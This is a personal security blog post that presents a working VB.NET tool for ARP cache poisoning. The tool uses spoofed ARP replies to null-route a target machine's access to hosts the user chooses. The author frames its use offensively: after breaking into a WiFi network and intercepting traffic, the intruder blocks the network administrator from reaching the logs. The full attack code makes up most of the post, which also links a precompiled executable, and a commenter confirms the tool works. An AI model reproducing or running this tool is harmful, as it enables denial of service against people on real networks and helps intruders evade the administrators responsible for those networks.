ARP LAND-Attack
Yeah, you know the deal.
Another network-based attack! This time, a LAND-attack (Local Area Network Denial - attack).
I know the first thing that comes to your mind is:
"LAME. With a MITM (Man-in-the-Middle), you can at least steal data, with this you simply DoS someone..."
Not so fast.
I've actually found this quite useful.
It requires a very small amount of packets to null-route a remote computer (remote; as in, a computer on the LAN you don't have physical access to).
Imagine this scenario:
- You found an encrypted WiFi-network.
- You cracked it.
- You got it in and started MITM'ing.
- However! The administrator notices, and starts checking the logs.
- What to do?!
- You get paranoid and stop.
But. What if.
...the administrator is unable to access the logs?
...because his ARP-cache tells him the remote logs is on his local computer?
Whose paranoid then?
This is a PoC of how you can poison the evil-administrators routes to critical systems (the systems you're after?); back to himself.
Imports nokitel.PCAP 'Make sure your project is running .NET 3.5; and add a reference to nokitel.dll.
Module ARP_Land_Attack
Private NIC As Adapters.Adapter = Nothing 'The NIC you will send from.
Private Adapters As New Adapters 'An instance of the NIC-enumuration.
Private TargetMAC As String 'Targets MAC-address.
Private TargetIP As Net.IPAddress 'Targets IPv4-address.
Private NullRoutes As New ArrayList 'List of addresses to disable.
Private Structure Route
Dim IP As Net.IPAddress
Dim MAC As String
End Structure
Sub Main()
ShowNICs()
ChooseNIC()
ChooseTarget() 'Who will we attack?
MakeNullroutes() 'What routes should we attack?
Nullroute() 'Attack!
End Sub
Private Sub ChooseTarget()
Dim Dummy As String = vbNullString
Do
Console.WriteLine()
Console.WriteLine("< Enter the targets IPv4:") Console.Write("> ")
Dummy = Console.ReadLine
Loop Until nokitel.Format.IsIPv4(Dummy)
TargetMAC = nokitel.Parse.ARP.GetMAC(Dummy, NIC.IP)
TargetIP = nokitel.Format.StringToIPAddress(Dummy)
End Sub
Private Sub MakeNullroutes()
Dim Dummy As String = vbNullString
Dim ExitSub As Boolean = False
Console.WriteLine()
Console.WriteLine("< Write ""start"" to poison the target.")
Do
Do
Console.WriteLine("< Enter an IPv4 to nullroute:") Console.Write("> ")
Dummy = Console.ReadLine
If Not String.IsNullOrEmpty(Dummy) Then
If nokitel.Format.RegexMatch(Dummy, "launch|start|attack|destroy|poison|kill|exterminate") Then
ExitSub = True
Exit Do
End If
End If
Loop Until nokitel.Format.IsIPv4(Dummy)
If ExitSub Then
If NullRoutes.Count > &H0 Then
Exit Do
Else
Console.WriteLine("! Enter atleast one route to poison.")
ExitSub = Not ExitSub
End If
Else
Dim Entry As New Route
With Entry
.IP = nokitel.Format.StringToIPAddress(Dummy) 'The IP-address to poison
.MAC = nokitel.Parse.ARP.GetMAC(.IP.ToString, NIC.IP) 'The corresponding MAC-address attached to the IP.
If String.IsNullOrEmpty(.MAC) Then .MAC = "00:00:00:00:00:00" 'If the ARP-request fails, we simply make a "blackhole".
End With
NullRoutes.Add(Entry) 'Add the route to the stack.
End If
Loop
Console.WriteLine()
End Sub
Private Sub Nullroute()
Dim Ethernet As New nokitel.Parse.Ethernet.Ethernet
Dim ARP As New nokitel.Parse.ARP.ARP
Dim Payload(nokitel.Parse.ARP.OFFSET) As Byte
Do
For Each Route As Route In NullRoutes
With Ethernet
.DestinationMAC = TargetMAC
.SourceMAC = nokitel.Format.RandomMAC 'Spoof that it's not us. Who knows?
.Type = nokitel.Parse.Ethernet.Ethernet_Types.ARP
End With
With ARP
.HardwareType = nokitel.Parse.ARP.HardwareType.Ethernet
.Operation = nokitel.Parse.ARP.OPCODES.Reply
.ProtocolAddressLength = &H4 'IPv4 Length (4 bytes).
.HardwareAddressLength = &H6 'MAC-address Length (6 bytes).
.ProtocolType = nokitel.Parse.ARP.ProtocolType.IP
.SenderHardwareAddress = TargetMAC 'Set the route's IP to the targets own MAC-address.
.SenderProtocolAddress = nokitel.Format.StringToIPAddress(Route.IP.ToString)
.TargetHardwareAddress = Route.MAC
.TargetProtocolAddress = nokitel.Format.StringToIPAddress(Route.IP.ToString)
Console.WriteLine("Poisoning " & TargetIP.ToString & "'s ARP-Cache ### " & Route.IP.ToString & " -=> " & TargetMAC)
End With
nokitel.Parse.Ethernet.Make(Payload, Ethernet) 'Grab the structures and convert them to raw-bytes.
nokitel.Parse.ARP.Make(Payload, ARP)
NIC.Send(Payload) 'Send the bogus packets!
Next
System.Threading.Thread.Sleep(2000) 'Sleep for a while, we don't need to be quick.
Loop
End Sub
Private Sub ShowNICs()
For Index As Integer = &H0 To Adapters.Enumurate.Length - &H1 'Loop through all available NIC's, and display their stats:
With Adapters.Enumurate(Index)
Console.WriteLine("* ID: " & Index)
Console.WriteLine("* Name: " & .Name)
Console.WriteLine("* Description: " & .Description)
Console.WriteLine("* GUID: " & .GUID)
Console.WriteLine("* Netmask: " & .Netmask)
Console.WriteLine("* Destination: " & .DestinationAddress)
Console.WriteLine("* Broadcast: " & .BroadcastAddress)
Console.WriteLine("* IP: " & .IP)
Console.WriteLine("* MAC: " & .MAC)
Console.WriteLine("* Gateway IP: " & .GatewayIP)
Console.WriteLine("* Gateway MAC: " & .GatewayMAC)
Console.WriteLine("* Supports WiFi: " & CStr(If(.IsWIFI, "Yes", "No")) & ".")
End With
Console.WriteLine()
Next
End Sub
Private Sub ChooseNIC()
Dim ID As String = vbNullString
Do
Console.Write("> ")
ID = Console.ReadLine
If IsNumeric(ID) Then
If ID >= &H0 And ID < Adapters.Enumurate.Length Then
NIC = Adapters.Enumurate(ID) 'Set the NIC-variable to the corresponding index from the "ShowNICs()" output.
If Not NIC.Open(, False) Then
Console.WriteLine("x Unable to hook device!")
End
End If
Exit Do
End If
End If
Loop
End Sub
End Module
Yeah, the code is a bit long. Sorry for that.
But I hope you understand the scenario.
Note: His ARP-Cache get restored almost instantly after you quit the attack. So no real harm done.
A pre-compiled Win32 executable can be downloaded from here.
And here's a screenshot of how I nullified my laptop:
ARP Land Attack
Evil isn't it?
Ciao.
3 Comments
-
-
SyRiAn_34G13 says:
tested ... works Great
thanx man -
Fredrik Nordberg Almroth says:
No problems sir!
Hey, I'm Fredrik. I'm from Sweden, born 1990, and I got a huge interest for information technology and information security. So far, I've been studying for three years at the Internation IT College of Sweden and one year at the Royal Institute of Technology (Kista, Sweden). I'm currently working at Young / Skilled and as a shareholder of Arctic Security. If you wish to contact me, please email me at h@ackack.net or follow me at twitter @Almroot.